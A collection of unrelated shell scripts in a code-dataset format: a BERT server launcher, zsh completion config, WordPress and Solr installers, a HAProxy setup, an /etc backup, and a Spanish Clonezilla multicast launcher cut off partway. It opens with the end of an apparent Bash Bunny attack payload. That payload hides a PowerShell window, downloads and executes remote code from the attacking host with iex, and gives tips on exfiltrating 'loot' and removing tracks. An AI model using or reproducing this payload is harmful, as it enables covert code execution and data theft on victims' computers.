RUN WIN "powershell -WindowStyle Hidden \"while (\$true) {If ((New-Object net.sockets.tcpclient(${HOST_IP},445)).Connected) {iex (New-Object Net.WebClient).DownloadString('\\\\${HOST_IP}\\s\\p\\p.txt');New-Item \\\\${HOST_IP}\\s\\COMPLETE -ItemType file;exit}}\""
# TIP: To exfil any data, upload to \\172.16.64.1\s\l\ -- this will be copied to the BB as loot
# TIP: Remove tracks in the psh payload if you wish
# STAGE 2 - HURRY UP AND WAIT
LED STAGE2
while ! [ -f /tmp/COMPLETE ]; do sleep 0.5; done
# CLEANUP
LED CLEANUP
# STASH THE LOOT
mv /tmp/l/* ${LOOTDIR_BB}/
rm -rf /tmp/{l,p}
# Sync file system
sync
LED FINISH
| true |
b97b1762f981a60071418f7592364825570e1bc3
|
Shell
|
ankitshah009/AudioCaption
|
/scripts/prepare_bertserver.sh
|
UTF-8
| 1,343 | 3.640625 | 4 |
[
"MIT"
] |
permissive
|
#!/bin/bash
#SBATCH --job-name bert-server
#SBATCH --partition=gpu
#SBATCH --cpus-per-task=2
#SBATCH --gres=gpu:1
#SBATCH --output=logs/bert-server-%j.log
#SBATCH --error=logs/bert-server-%j.err
# Download the BERT model for the requested language (zh or en) into the
# given directory and start a bert-serving instance on this node.
# Bug fix: the usage line documents two mandatory arguments
# (<bert-server-dir> and <lang>) but the guard only required one, letting a
# missing <lang> slip through with $2 empty.
if [ $# -lt 2 ]; then
cat >&2 <<EOF
Usage: $0 <bert-server-dir> <lang> [<num-worker>]
e.g.: $0 utils/bert zh 4
EOF
exit 1;
fi
node=$(hostname -s)
module load cuda/10.0
source activate bertserver
bertserver=$1
num_worker=3
lang=$2
# Optional third argument overrides the worker count.
if [ $# -eq 3 ]; then
num_worker=$3
fi
[ ! -d $bertserver ] && mkdir $bertserver
cd $bertserver
# Fetch and unpack the pretrained model if it is not already present.
if [ $lang == "zh" ]; then
model_dir="chinese_L-12_H-768_A-12"
if [ ! -d chinese_L-12_H-768_A-12 ]; then
[ ! -f chinese_L-12_H-768_A-12.zip ] && wget https://storage.googleapis.com/bert_models/2018_11_03/chinese_L-12_H-768_A-12.zip
unzip chinese_L-12_H-768_A-12.zip
fi
else
model_dir="uncased_L-12_H-768_A-12"
if [ ! -d uncased_L-12_H-768_A-12 ]; then
mkdir uncased_L-12_H-768_A-12
[ ! -f uncased_L-12_H-768_A-12.zip ] && wget https://storage.googleapis.com/bert_models/2020_02_20/uncased_L-12_H-768_A-12.zip
unzip uncased_L-12_H-768_A-12.zip -d uncased_L-12_H-768_A-12
fi
fi
# print which machine the server is running on
echo -e "
Bert server is running on ${node}
"
bert-serving-start -model_dir ${model_dir} -num_worker ${num_worker}
| true |
b1ba85f9816a3017b65b5d49a83a61442d22a501
|
Shell
|
aroig/dotfiles
|
/shell/system/shellrc.d/completion.sh
|
UTF-8
| 1,649 | 3.203125 | 3 |
[] |
no_license
|
#!/bin/zsh
#------------------------------------------------------------------#
# File: completion.zsh Completion adjustments #
# Version: #
# Author: Abdó Roig-Maranges <abdo.roig@gmail.com> #
#------------------------------------------------------------------#
# Shell-agnostic completion setup: configure zsh's completion system when
# running under zsh, or load bash-completion when running under bash.
if [ "$ZSH_VERSION" ]; then
# add completions to fpath
fpath=($HOME/.zsh/completions $fpath)
# enable completion
zmodload zsh/complist
autoload -U compinit
# -u skips the insecure-directory ownership check.
compinit -u
# settings
setopt bash_auto_list # Bring list on second tab.
setopt glob_complete # Autocomplete with glob
# colorize stuff
zstyle ':completion:*:default' list-colors ${(s.:.)LS_COLORS} # colorize file lists
zstyle ':completion:*:*:systemctl*' list-colors ${SYSTEMD_COLORS} # colorize systemd units
zstyle ':completion:*' matcher-list 'm:{a-zA-Z}={A-Za-z}' # case insensitive
zstyle ':completion:*:descriptions' format '%U%B%d%b%u' # heading format
zstyle ':completion:*' menu select=4 # menu selection when >= 4 options
#--------------------------#
# Function completions #
#--------------------------#
# copy a completions from oldcmd to newcmd
# compdef newcmd=oldcmd
compdef mk=make
# compdef jctl=journalctl
# zstyle ':completion::*:expand:*' tag-order all-expansions
fi
if [ "$BASH_VERSION" ]; then
if [ -r /usr/share/bash-completion/bash_completion ]; then
source /usr/share/bash-completion/bash_completion
fi
fi
| true |
1c0a45c51d8b0b6d9b2fc9b7ea1180493e65d5a7
|
Shell
|
jewmich/wordpress
|
/docker/docker-entrypoint.sh
|
UTF-8
| 1,733 | 3.890625 | 4 |
[] |
no_license
|
#!/bin/bash
set -euo pipefail
# Custom entrypoint that only handles installing Wordpress. We don't need any of the environment
# setting stuff (we have our own version of wp-config.php that stores secrets outside Git) or the DB
# creation logic (which the Docker MySQL image handles for us).
# NOTE(review): '-a' inside '[ ... ]' is obsolescent; two separate tests
# would be the modern form — behavior here is unchanged.
if ! [ -e index.php -a -e wp-includes/version.php ]; then
echo >&2 "WordPress not found in $(pwd) - copying now..."
if [ "$(ls -A)" ]; then
echo >&2 "WARNING: $(pwd) is not empty - press Ctrl+C now if this is an error!"
( set -x; ls -A; sleep 10 )
fi
# Copy the bundled WordPress tree into the (possibly mounted) work dir.
tar cf - --one-file-system -C /usr/src/wordpress . | tar xf -
echo >&2 "Complete! WordPress has been successfully copied to $(pwd)"
if [ ! -e .htaccess ]; then
# NOTE: The "Indexes" option is disabled in the php:apache base image
cat > .htaccess <<-'EOF'
# BEGIN WordPress
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
</IfModule>
# END WordPress
EOF
chown www-data:www-data .htaccess
fi
fi
cd ..
if ! [ -e composer.phar ]; then
# Install composer (taken from https://getcomposer.org/doc/faqs/how-to-install-composer-programmatically.md)
EXPECTED_SIGNATURE=$(curl -s https://composer.github.io/installer.sig)
php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
ACTUAL_SIGNATURE=$(php -r "echo hash_file('SHA384', 'composer-setup.php');")
# Abort if the downloaded installer does not match the published signature.
if [ "$EXPECTED_SIGNATURE" != "$ACTUAL_SIGNATURE" ]
then
>&2 echo 'ERROR: Invalid installer signature'
exit 1
fi
php composer-setup.php --quiet
rm composer-setup.php
fi
php composer.phar install
cd -
# Hand control over to the command passed by the Docker runtime.
exec "$@"
| true |
ecb62c50bc20aeaff898923572709b0815ddcd8f
|
Shell
|
pdixon/dotfiles
|
/bin/backup-etc
|
UTF-8
| 135 | 2.734375 | 3 |
[] |
no_license
|
#!/bin/bash
# Archive /etc into a dated, gzip-compressed tarball in the home directory,
# staying on a single filesystem.
host=$(hostname -s)
stamp=$(date "+%Y-%m-%d")
tarfile=~/"${host}-etc-${stamp}.tar.gz"
cd /
tar -v --create --gzip --one-file-system -f "${tarfile}" etc
| true |
a7f9ad02695b2d83fd4563dd732e8079db6cc425
|
Shell
|
EducopiaInstitute/etdplus-installscripts
|
/install_solr.sh
|
UTF-8
| 2,134 | 3.78125 | 4 |
[] |
no_license
|
#!/bin/bash
# Install Solr and set up Solr core
# Note that this must be done after installing the Sufia application because it
# uses configuration files from the "solr_conf" directory in setting up the core.
set -o errexit -o nounset -o xtrace -o pipefail
# Read settings and environmental overrides
# $1 = platform (aws or vagrant); $2 = path to install scripts
[ -f "${2}/config.sh" ] && . "${2}/config.sh"
[ -f "${2}/config_${1}.sh" ] && . "${2}/config_${1}.sh"
cd "$INSTALL_DIR"
# Install Java 8 and make it the default Java
add-apt-repository -y ppa:webupd8team/java
apt-get update -y
# Pre-accept the Oracle license so the installer runs non-interactively.
echo oracle-java8-installer shared/accepted-oracle-license-v1-1 select true | /usr/bin/debconf-set-selections
apt-get install -y oracle-java8-installer
update-java-alternatives -s java-8-oracle
# Install Solr
# Fetch the Solr distribution and unpack the install script
wget -q "$SOLR_MIRROR/$SOLR_DIST.tgz"
tar xzf $SOLR_DIST.tgz $SOLR_DIST/bin/install_solr_service.sh --strip-components=2
# Install and start the service using the install script
bash ./install_solr_service.sh $SOLR_DIST.tgz -u $SOLR_USER -d $SOLR_MUTABLE -i $SOLR_INSTALL
# Remove Solr distribution
rm $SOLR_DIST.tgz
rm ./install_solr_service.sh
# Stop Solr until we have created the core
service solr stop
# Create Sufia Solr core
cd $SOLR_DATA
$RUN_AS_SOLR_USER mkdir -p ${SOLR_CORE}/conf
# NOTE(review): the '>' redirection below is performed by the calling (root)
# shell, not by $RUN_AS_SOLR_USER — the file is created with root ownership.
$RUN_AS_SOLR_USER echo "name=$SOLR_CORE" > ${SOLR_CORE}/core.properties
install -o $SOLR_USER -m 444 $HYDRA_HEAD_DIR/solr_conf/conf/solrconfig.xml ${SOLR_CORE}/conf/solrconfig.xml
install -o $SOLR_USER -m 444 $HYDRA_HEAD_DIR/solr_conf/conf/schema.xml ${SOLR_CORE}/conf/schema.xml
# Make links to keep the Hydra Solr solrconfig.xml paths happy
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/contrib
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/dist
$RUN_AS_SOLR_USER mkdir lib
$RUN_AS_SOLR_USER ln -s $SOLR_INSTALL/solr/contrib lib/contrib
# Adjust logging settings
$RUN_AS_SOLR_USER sed -i 's/^log4j.rootLogger=.*$/log4j.rootLogger=INFO, file/' /var/solr/log4j.properties
$RUN_AS_SOLR_USER sed -i "s/file.MaxFileSize=.*$/file.MaxFileSize=${SOLR_LOGSIZE}/" /var/solr/log4j.properties
| true |
418bdba0026b72f4e07800fce94a5b2d1f62cfcc
|
Shell
|
ianpreston/oh-my-py
|
/install.sh
|
UTF-8
| 485 | 3.328125 | 3 |
[
"MIT"
] |
permissive
|
#!/bin/sh
# Install the oh-my-py IPython profile: create the "sh" profile and symlink
# the extension and config from this checkout into ~/.ipython.
if [ ! -d "extension" ]; then
echo "Script must be run from within oh-my-py install directory"
exit 1
fi
ipython profile create sh
# Remove any previous links/files; '|| true' keeps a fresh install from
# failing when they do not exist yet.
rm $HOME/.ipython/profile_sh/ipython_config.py || true
rm $HOME/.ipython/extensions/ohmypy || true
ln -s `pwd`/extension $HOME/.ipython/extensions/ohmypy
ln -s `pwd`/config.py $HOME/.ipython/profile_sh/ipython_config.py
echo "Success! Now run IPython like this: $ ipython --profile sh"
echo "See `pwd`/README.md for more information"
| true |
7b093abdb0bac3c202650974e682bcb1764a42de
|
Shell
|
jtaleric/plow
|
/workloads/baseline-performance/common.sh
|
UTF-8
| 777 | 2.78125 | 3 |
[
"Apache-2.0"
] |
permissive
|
#!/usr/bin/env bash
# Shared setup for the baseline-performance workload: log in to OpenShift
# and export the settings kube-burner needs (ES indexing, watch window,
# run UUID, and the cluster's Prometheus endpoint/token).
source ../../utils/common.sh
openshift_login
export KUBE_BURNER_RELEASE_URL=${KUBE_BURNER_RELEASE_URL:-latest}
export ENABLE_INDEXING=${ENABLE_INDEXING:-true}
export ES_SERVER=${ES_SERVER:-https://search-perfscale-dev-chmf5l4sh66lvxbnadi4bznl3a.us-west-2.es.amazonaws.com:443}
export ES_INDEX=${ES_INDEX:-ripsaw-kube-burner}
export WRITE_TO_FILE=${WRITE_TO_FILE:-false}
# Time duration for which kube-burner will collect metrics
export WATCH_TIME=${WATCH_TIME:-30}
export UUID=${UUID:-$(uuidgen)}
# Prometheus URL and service-account token are read from the live cluster.
export PROM_URL=https://$(oc get route -n openshift-monitoring prometheus-k8s -o jsonpath="{.spec.host}")
export PROM_TOKEN=$(oc -n openshift-monitoring sa get-token prometheus-k8s)
# log MESSAGE... -- print a bold, timestamped message to stdout.
# NOTE(review): "$*" is the conventional expansion inside a quoted string;
# ${@} works here but joins arguments with spaces anyway.
log(){
echo -e "\033[1m$(date "+%d-%m-%YT%H:%M:%S") ${@}\033[0m"
}
| true |
63a58e0fdb6c0c3e447a3e60a212d8b7f0f51c5d
|
Shell
|
andrewreach/XcodeGen
|
/Tests/Fixtures/TestProject/build.sh
|
UTF-8
| 961 | 2.671875 | 3 |
[
"MIT",
"LicenseRef-scancode-unknown-license-reference"
] |
permissive
|
#!/bin/bash
set -e
# Bootstrap Carthage dependencies (dynamic and static) for the fixture
# project, then build the iOS and macOS apps without code signing.
CARTHAGE_DYNAMIC_FRAMEWORKS=(Result)
CARTHAGE_STATIC_FRAMEWORKS=(SwiftyJSON swift-nonempty)
carthage bootstrap $CARTHAGE_DYNAMIC_FRAMEWORKS --cache-builds
# Prepare xcconfig for static bootstrapping
# MACH_O_TYPE=staticlib forces Carthage to build these frameworks statically.
STATIC_CONFIG=$(mktemp -d)/static.xcconfig
echo "MACH_O_TYPE = staticlib" > $STATIC_CONFIG
XCODE_XCCONFIG_FILE=$STATIC_CONFIG \
carthage bootstrap $CARTHAGE_STATIC_FRAMEWORKS --cache-builds
echo "
⚙️ Building iOS app"
xcodebuild -quiet -workspace Workspace.xcworkspace -scheme "App_iOS Test" -configuration "Test Debug" CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGN_ENTITLEMENTS="" CODE_SIGNING_ALLOWED="NO"
echo "✅ Successfully built iOS app"
echo "
⚙️ Building macOS app"
xcodebuild -quiet -workspace Workspace.xcworkspace -scheme "App_macOS" -configuration "Test Debug" CODE_SIGN_IDENTITY="" CODE_SIGNING_REQUIRED=NO CODE_SIGN_ENTITLEMENTS="" CODE_SIGNING_ALLOWED="NO"
echo "✅ Successfully built macOS app"
| true |
e91cc4c8b964091e0af1cfd09035a44baed3fb3f
|
Shell
|
Moorviper/zen2vdr
|
/build.sh
|
UTF-8
| 344 | 2.5625 | 3 |
[] |
no_license
|
#!/bin/bash
# Build every zen2vdr component in sequence, returning to the repository
# root between steps. Component-specific settings are passed as per-command
# environment variables.
BASEDIR=`pwd`
cd zentoo-kernel-build
./build.sh
cd $BASEDIR
cd zentoo-os-build
./build.sh
cd $BASEDIR
cd zentoo-smt-tools
PREFIX="/zensysgen-glibc" ./build.sh
cd $BASEDIR
cd zenvdr-build
RESOURCE="R2" TARGET_DIR="/zensysgen-glibc" METHOD="tar" ./build.sh
cd $BASEDIR
cd zenvdr-init
./install.sh "/zensysgen-glibc"
cd $BASEDIR
| true |
75b56251f9a2d6e408efbe1759da05ede197ad13
|
Shell
|
thomasdarimont/akvo-provisioning
|
/puppet/modules/butler/templates/update.sh.erb
|
UTF-8
| 722 | 3.203125 | 3 |
[] |
no_license
|
#!/bin/bash
# Deploy/update the Butler app: clone or update the checkout at the given
# branch, install it into the virtualenv, run migrations, and bounce the
# supervisord services. (Puppet ERB template: <%= @approot %> is expanded
# at provisioning time.)
set -e
BRANCH=$1
ORIG_DIR=`pwd`
# Directory containing this script.
# NOTE(review): HERE is never referenced below — possibly dead code.
HERE="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
VENV=<%= @approot %>/venv
CODE=<%= @approot %>/code
MANAGE=<%= @approot %>/manage.sh
# Create the virtualenv on first run.
if [ ! -d $VENV ]
then
virtualenv $VENV
fi
# Clone the repository on first run.
if [ ! -d <%= @approot %>/code ]
then
git clone https://github.com/akvo/butler.git $CODE
fi
cd $CODE
git checkout $BRANCH
git pull origin $BRANCH
cd $ORIG_DIR
PIP=$VENV/bin/pip
# Editable install with the mysql extra; --pre allows pre-release deps.
$PIP install -e $CODE[mysql] --upgrade --pre
# Stop services while the database schema is migrated.
sudo /usr/bin/supervisorctl stop butler_web
sudo /usr/bin/supervisorctl stop butler_worker
$MANAGE syncdb --noinput
$MANAGE migrate
$MANAGE collectstatic --noinput
sudo /usr/bin/supervisorctl start butler_web
sudo /usr/bin/supervisorctl start butler_worker
| true |
62219d7e0a34eaec422f072824a33b9f2be15677
|
Shell
|
christopherdoyle/dotfiles
|
/scripts/check-environment.sh
|
UTF-8
| 588 | 3.375 | 3 |
[] |
no_license
|
#!/bin/bash
# Report which common development commands are available on this machine,
# plus whether pip is usable from python and python3.
commands=( "wget" "curl" "htop" "vim" "nvim" "go" "python" "python3" )

# print_status NAME AVAILABLE -- render one aligned table row.
print_status() {
printf "%-15s%s\n" "$1" "$2"
}

for item in "${commands[@]}"
do
if command -v "$item" &> /dev/null; then
print_status "$item" "yes"
else
print_status "$item" "no"
fi
done

# The pip-module check is identical for both interpreters; loop instead of
# duplicating the if/else block twice.
for py in python python3
do
if command -v "$py" &> /dev/null && "$py" -m pip &> /dev/null; then
print_status "$py pip" "yes"
else
print_status "$py pip" "no"
fi
done
| true |
e1f07804d44249e14fbf597be02078eadbdfe4ac
|
Shell
|
delkyd/alfheim_linux-PKGBUILDS
|
/python2-myhdl-git/PKGBUILD
|
UTF-8
| 918 | 2.578125 | 3 |
[] |
no_license
|
# Maintainer: Alex Forencich <alex@alexforencich.com>
# PKGBUILD for the git version of MyHDL (Python 2), including the Icarus
# Verilog cosimulation VPI module.
pkgname=python2-myhdl-git
pkgver=0.9.0.r29.g983a169
pkgrel=1
pkgdesc="a Python-Based Hardware Description Language"
arch=('any')
url="http://www.myhdl.org/"
license=('LGPL')
depends=('python2' 'iverilog')
makedepends=('git')
provides=('python2-myhdl')
_gitroot='https://github.com/jandecaluwe/myhdl.git'
_gitname='myhdl'
source=("$_gitname::git+$_gitroot")
md5sums=('SKIP')
# Derive the version from the latest git tag: vX.Y.Z-N-ghash -> X.Y.Z.rN.ghash
pkgver() {
cd "$srcdir/$_gitname"
git describe --tags --long | sed -E 's/^v//;s/([^-]*-g)/r\1/;s/-/./g'
}
# Build the Icarus Verilog cosimulation VPI module.
build() {
cd "$srcdir/$_gitname"
cd $srcdir/$_gitname/cosimulation/icarus
make
}
# Install the Python package, the license, and the VPI module.
package() {
cd "$srcdir/$_gitname"
python2 setup.py install --prefix=/usr --root="$pkgdir/" --optimize=1
install -m 0644 -D ./LICENSE.txt $pkgdir/usr/share/licenses/$pkgname/LICENSE.txt
install -m 0755 -D $srcdir/$_gitname/cosimulation/icarus/myhdl.vpi $pkgdir/usr/lib/ivl/python2-myhdl.vpi
}
| true |
0a4ac07e95426563843589045b4e818f23a47214
|
Shell
|
yasuhiroki/iypymtiycaa
|
/zshef/cookbooks/nodejs/firebase.zshef
|
UTF-8
| 558 | 2.65625 | 3 |
[] |
no_license
|
#!/usr/bin/env zsh
# zshef cookbook for the firebase CLI: installs/updates firebase-tools
# globally via npm.
# Install hook: install firebase only when it is not already present.
function zshef::install() {
zshef::util::mng::is_installed "firebase" || {
my::install::firebase
}
}
# Update hook: reinstall (upgrade) firebase only when it is present.
function zshef::update() {
zshef::util::mng::is_installed "firebase" && {
my::install::firebase
}
}
# Install firebase-tools globally; fails early if node or npm is missing.
function my::install::firebase() {
zshef::util::mng::is_installed "node" || {
zshef::util::log::error "Depends node"
return 1
}
zshef::util::mng::is_installed "npm" || {
zshef::util::log::error "Depends npm"
return 1
}
npm install -g firebase-tools
}
| true |
820e65b9b7bf352bf383b41bc6dede6ff5deb4b9
|
Shell
|
luroto/holberton-system_engineering-devops
|
/0x0F-load_balancer/1-install_load_balancer
|
UTF-8
| 621 | 2.5625 | 3 |
[] |
no_license
|
#!/usr/bin/env bash
# This script installs and configures HAproxy as load balancer
sudo apt-get install software-properties-common -y
sudo add-apt-repository ppa:vbernat/haproxy-1.8 -y
sudo apt-get update -y
sudo apt-get install haproxy=1.8.\* -y
# Enable the haproxy init script.
echo "ENABLED=1" |sudo tee -a /etc/default/haproxy
sudo service haproxy start
# Append a round-robin frontend/backend pair for the two web servers.
echo -e "frontend http\n \tbind *:80\n \tmode http\n \tdefault_backend holberton\n backend holberton\n \tmode http\n \tbalance roundrobin\n \tserver 774-web-01 35.237.52.158:80 check\n \tserver 774-web-02 34.74.28.162:80 check" | sudo tee -a /etc/haproxy/haproxy.cfg
sudo service haproxy restart
| true |
c5189c4fa38f4ac26743cc82b09a7a3db1a4816b
|
Shell
|
sio2sio2/clonaton
|
/app/modules/clonezilla/scripts/dcs.sh
|
UTF-8
| 19,374 | 3.53125 | 4 |
[] |
no_license
|
#!/bin/sh
#
# Launches multiserver Clonezilla by preparing the drbl-ocs
# command line.
# Can be launched on the server itself (see dcs -h).
#
DRBL_PATH="`dirname $0`/../drbl"
DRBL_OCS="$DRBL_PATH/sbin/drbl-ocs"
# Default options passed to the server's drbl-ocs and the
# client's ocs-sr.
OPTS="--batch
-g auto
-e1 auto
-e2
-r
-j2
-l es_ES.UTF-8"
title="Lanzador de clonación multicast"
SCRIPTDIR=$(dirname $0)
. "$SCRIPTDIR/lib/dialog.sh"
. "$SCRIPTDIR/lib/utils.sh"
vars
PHPUTILS=$(readlink -f "$SCRIPTDIR/../utils.php")
# Ask the PHP helper for the classroom list; the functions below parse each
# line as "name=network,iface".
eval "$(php -d error_reporting=E_STRICT -r 'require("'"$PHPUTILS"'");
echo "lista_aulas=\"".lista_aulas()."\"\n";
')"
# Print the (Spanish) usage/help text for this launcher to stdout.
help() {
echo "$(basename $0) [opciones] [operación] [imagen] [dispositivo [...]]
Lanzador de clonezilla para restauracióon multicast.
+ Opciones:
-b, --batch Obliga a que toda la información se
proporcione por línea de comandos y
falla en caso contrario.
-c, --client-to-wait NUM Número de clientes cuya conexión espera
el servidor antes de comenzar la
restauracion multicast.
-h, --help Muestra esta misma ayuda.
-i, --mcast-iface IFACE Interfaz de escucha para multicast.
-n, --no-poweroff No apaga el servidor al término de la
operación.
-o, --poweroff Apaga el servidor al término de la
operación.
-p, --post [true|poweroff|reboot] Orden que se enviará al cliente al fin
de la restauración. \"true\" significa que
que el cliente quedará encendido con la
línea de comandos habilitada..
-r, --room AULA Aula en la que se desea realizar la
clonación multicast. Es altirnativa a
-i, aunque menos prioritaria.
-s, --simulate Muestra la orden que arranca clonezilla
server, pero no la ejecuta.
-t, --max-time-to-wait SEGUNDOS Tiempo máximo en segundos desde la
conexión del primer cliente que esperará
el servidor antes de empezar la
restauracón. Por defecto, 0, que
significa que esperará indefinidamente
hasta que se conecte el número de
clientes especificado con la opción -c.
+ Operación:
startdistk Resataura discos completos.
startparts Restaura particiones individuales.
stop Cancela una restauración ya lanzada.
+ Imagen es el nombre de la imagen que se quiere restaurar, si solo se indica
un nombre y se buscará en el directorio predeterminado de imágenes. Si se
indica una ruta completa, se tomará ésta como el directorio que contiene la
imagen.
En el caso de que la operación sea "stop" representa la imagen de la que
se quiere parar el lanzamiento.
+ Dispositivos son aquellos discos (startdisk) o particiones (startparts) que
se pretenden restaurar.
A menos que se incluya la opción -b, se preguntará mediante cuadros de diálogo
aquellos datos necesarios para completar la orden que no tiene valor
predeterminado.
"
}
#
# Get the network a classroom belongs to.
# $1: classroom name
# Prints the network (the value between "=" and the first ",") for the
# matching line of $lista_aulas; grep's exit status is non-zero if no
# classroom matches.
#
get_network() {
echo "$lista_aulas" | grep -oP '(?<=^'"$1"'=)[^,]+(?=,)'
}
#
# List the configured interfaces and their IP address, one "iface=ip"
# pair per line.
#
list_ifaces() {
# Strip the /prefix mask from the IP.
ip -f inet -o addr show | awk '{print $2 "=" substr($4, 0, index($4, "/"))}'
}
#
# Check whether an IP address belongs to a network.
# (requires python3, falling back to python)
# $1: the IP address
# $2: the network address in CIDR form
#
# Returns 0 if it belongs, non-zero otherwise (including when no Python
# interpreter is available or the arguments are malformed).
ip_in_network() {
    # 'command -v' is the portable replacement for 'which'; split the
    # assignment so the lookup's exit status drives the fallback.
    local python
    python=$(command -v python3) || python=$(command -v python)
    $python -c 'import ipaddress as ip; exit(ip.ip_address("'$1'") not in ip.ip_network("'$2'"))' 2>/dev/null
}
#
# Obtiene la interfaz a la que está asociada un aula.
# $1: Aula
#
# return El nombre de la interfaz
#room2iface() {
# local net x ip
# net=$(get_network "$1") || return 1
#
# for x in $(list_ifaces); do
# ip=${x#*=}
# if ip_in_network $ip $net; then
# echo ${x%=*}
# return 0
# fi
# done
# return 1
#}
# Map a classroom name to its interface, reading the third comma/equals
# separated field of the matching $lista_aulas line. Fails (via grep '.')
# when the room is unknown or has no interface.
room2iface() {
    local room="$1"
    echo "$lista_aulas" | awk -F'[,=]' -v r="$room" '$1 == r {print $3}' | grep '.'
}
#
# Obtiene el aula a la que está asociada una interfaz
# $1: Interfaz
#
# return El nombre del aula
#iface2room() {
# local IFS linea aula net ip=$(list_ifaces | grep -oP '(?<=^'"$1"'=).+$')
# IFS='
#'
# for linea in $lista_aulas; do
# aula=${linea%%=*}
# net=${linea#*=} ; net=${net%%,*}
# if ip_in_network $ip $net; then
# echo $aula
# return 0
# fi
# done
# return 1
#}
# Map an interface back to its classroom: first comma/equals separated
# field of the $lista_aulas line whose third field is the interface.
# Fails (via grep '.') when no classroom uses the interface.
iface2room() {
    local dev="$1"
    echo "$lista_aulas" | awk -F'[,=]' -v ifc="$dev" '$3 == ifc {print $1}' | grep '.'
}
#
# Check whether the argument is a (non-negative, decimal) number.
# $1: the value to check
#
es_numero() {
    # printf avoids echo's option parsing (e.g. an argument of "-n"),
    # and grep -E replaces the deprecated egrep alias.
    printf '%s\n' "$1" | grep -Eq '^[0-9]+$'
}
#
# Print an error message on stderr and terminate the program.
# $1: the exit code
# $2...: the message
#
eerror() {
    local status="$1"
    shift
    echo "$@" >&2
    exit "$status"
}
#
# Resolve an image name (or an absolute path) to its image directory.
# $1: the image name, or the path to the image directory when it is an
#     absolute path.
#
get_imgdir() {
    local image="$1" desc
    # Absolute path (starts with "/"): the caller already gave the directory.
    [ -z "${1%%/*}" ] && echo "$image" && return 0
    # Search every image directory for a descriptor whose declared name
    # matches $1 (same glob pattern as list_images). The original iterated
    # only "$imgdir/$image/$descfile", so lookup failed whenever the
    # directory name differed from the image name.
    for desc in "$imgdir"/*/"$descfile"; do
        read_desc "$desc" x
        [ "$x_nombre" = "$1" ] && dirname "$desc" && return 0
    done
    return 1
}
#
# Print the list of disks recorded for an image.
# $1: path to the image directory
#
list_disks() {
    local imagedir="$1"
    cat "${imagedir}/disk"
}
#
# Print the list of partitions recorded for an image.
# $1: path to the image directory
#
list_parts() {
    local imagedir="$1"
    cat "${imagedir}/parts"
}
#
# Verify the devices are appropriate for the operation: disks when the
# operation is "startdisk", partitions when it is "startparts".
# $1: operation
# $2: path to the image directory
# $3...: the devices to validate
# On failure prints the first offending device and returns 1.
#
check_devices() {
	# NOTE(review): 'parts' is declared but never used.
	local action="$1" imagedir="$2" devices parts
	shift 2
	case $action in
	startdisk)
		devices=$(list_disks "$imagedir")
		;;
	startparts)
		devices=$(list_parts "$imagedir")
		;;
	stop) return 0 ;;
	*) eerror 3 "$action: Operación incorrecta";;
	esac
	# grep -qw: match the device as a whole word within the recorded list.
	while [ $# -gt 0 ]; do
		echo "$devices" | grep -qw "$1" || { echo $1; return 1; }
		shift
	done
	return 0
}
#
# Check whether a multicast restore of the image is already running.
# $1: the image name
# The running-restore marker path is built from the $multifile template by
# substituting "{{image}}" with the image name.
#
restoring_image() {
    # Quote the command substitution: the original unquoted form broke
    # (or mis-evaluated) when the resulting path contained whitespace.
    [ -f "$(echo "$multifile" | sed -r 's:\{\{image\}\}:'"$1:")" ]
}
#
# Check whether an image is visible from a classroom.
# $1: the classroom
# $2...: the image's visibility tokens ("@room" or "@*" for any room)
#
visible_from_room() {
    local aula="$1"
    shift
    # Match a whole "@room" or "@*" token. The original pattern used
    # "(?...)" groups, which are PCRE syntax and invalid in POSIX/GNU ERE,
    # so egrep rejected the expression outright. \b and \s are GNU grep
    # ERE extensions, as in the original.
    echo "$*" | grep -Eq '@('"$aula"'\b|\*)(\s|$)'
}
#
# List the visible images.
# $1: classroom the images are seen from (empty implies any classroom)
# $2: empty to list every visible image; 0 to list only visible images
#     that are NOT being restored; 1 for the opposite.
#
# return: a list where each line looks like:
#
#	'/path/to/image'  'description or name'
#
list_images() {
	local aula=$1 desc
	for desc in "$imgdir"/*/"$descfile"; do
		# read_desc populates x_* variables from the descriptor file.
		read_desc "$desc" x
		[ -n "$aula" ] && ! visible_from_room "$aula" $x_visibilidad && continue
		if [ -n "$2" ]; then
			{ [ $2 -eq 0 ] && ! restoring_image $x_nombre; } || \
			{ [ $2 -eq 1 ] && restoring_image $x_nombre; } || continue
		fi
		echo "'$(dirname $desc)' '${x_desc:-$x_nombre}'"
	done
}
#
# List every classroom from which an image is visible.
# When no image is given, every classroom is returned.
# $1: path to the image directory
#
# return: a list where each line looks like:
#
#	aula 'description or name'
#
list_aulas() {
	local imagedir=$1 linea
	[ -n "$imagedir" ] && read_desc "$imagedir/$descfile" x
	# $lista_aulas lines look like "room=network,iface,description".
	echo "$lista_aulas" | while read linea; do
		aula=${linea%%=*}
		desc=${linea##*,}
		[ -n "$imagedir" ] && ! visible_from_room $aula $x_visibilidad && continue
		# Skip rooms that are not bound to a local interface.
		iface=$(room2iface "$aula") || continue
		echo "$iface '${desc:-$aula}'"
	done
}
#
# Ask which image should be cloned.
# $1: classroom the clone runs from (or empty)
#
# return: the image directory, and status
#	+ 0: an image was selected
#	+ 1: no images are available
#	+ 2: the selection was cancelled
#
pregunta_imagen() {
	local aula=$1 resp items num
	items=$(list_images "$aula" 0)
	# items is a quoted "'dir' 'desc'" list; eval re-splits it into pairs.
	eval set -- $items
	num=$(($#/2))
	case $num in
	0) return 1;;
	1) resp=${items%% *};;
	*) resp=$(dialog --notags --menu "Escoja la imagen a clonar" \
			$(menu_height num) 75 $num "$@") || return 2
		;;
	esac
	eval echo $resp
}
#
# Ask which classroom the clone should run from.
# $1: the image path (or empty)
# $2: the image name
#
# return: the classroom name, and status
#	+ 0: a classroom was selected
#	+ 1: no classroom can be selected because the image is not
#	     visible from any of them
#	+ 2: the selection was cancelled
#
pregunta_aula() {
	local imagedir="$1" image="$2" resp items num leyenda="Seleccione el aula"
	items=$(list_aulas "$imagedir")
	eval set -- $items
	num=$(($#/2))
	[ -z "$items" ] && num=0
	[ -n "$image" ] && leyenda="${leyenda} para clonar $image"
